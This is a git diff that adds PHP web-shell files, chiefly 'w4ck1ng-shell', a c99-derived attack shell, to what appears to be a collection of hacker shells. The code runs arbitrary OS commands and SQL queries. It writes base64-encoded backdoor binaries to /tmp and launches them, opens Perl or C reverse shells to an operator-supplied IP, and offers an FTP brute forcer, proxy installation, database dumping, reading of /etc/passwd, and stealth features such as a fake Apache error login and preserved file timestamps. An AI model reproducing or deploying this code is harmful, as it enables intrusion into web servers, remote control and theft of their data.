+//Notify user of current connection
+if($_REQUEST['change'] && $user != '') {
+echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $user</b></font>";
+}
+if(!$_REQUEST['change'] && $username != '') {
+echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $username</b></font>";
+}
+
+//Database Time
+//initial pre-cookie
+$db_c = @mysql_select_db($dbn,$con);
+if(!$db_c) {
+//secondary post-cookie
+$db_d = @mysql_select_db($database,$con1);
+if(!$db_d) {
+if(isset($database) || isset($dbn)) {
+echo "<br><font color=#00CC00><b>Unable to access database!";
+}
+}
+}
+//query function
+query();
+
+function query() {
+$query = $_GET['query'];
+if($query == '') {
+echo "<br><font color=#00CC00><b>No Query Executed</b></font>";
+}
+else {
+//Query Time
+$query1 = str_replace("\\", " ", $query);
+$result = @mysql_query("$query1");
+echo "<br><b><font color=#00CC00>Query Results: <br /></b></font> ";
+        echo "<table border=1 cellpadding=0 cellspacing=0 width=100% style=\"font-size: 14px; font-family: Trebuchet;\">
+                <tr bgcolor=white align=center style=\"font-weight: bold;\">\n";
+
+$rr = @mysql_num_fields($result);
+                for($kz=0; $kz<$rr; $kz++)
+                {
+                        $ee = @mysql_field_name($result,$kz);
+                        echo "<td bgcolor=#FFFFFF>$ee</td>";
+                }
+                echo "</tr>\n";
+
+                $vv = true;
+                while ($line = @mysql_fetch_array($result, MYSQL_ASSOC)) {
+                        if($vv === true){
+                        echo "<tr align=center bgcolor=#00CC00>\n";
+                        $vv = false;
+                        }
+                        else{
+                        echo "<tr align=center bgcolor=#00CC00>\n";
+                        $vv = true;
+                        }
+                        foreach ($line as $col_value) {
+                echo "<td>$col_value</td>\n";
+                        }
+                echo "</tr>\n";
+                }
+                echo "</table>\n";
+
+                @mysql_free_result($result);
+
+}
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/w4k.php.php.txt b/xakep-shells/PHP/w4k.php.php.txt
new file mode 100644
index 0000000..d870490
--- /dev/null
+++ b/xakep-shells/PHP/w4k.php.php.txt
@@ -0,0 +1,2830 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+//removed backdoor
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+//$log_email = "synsta@gmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
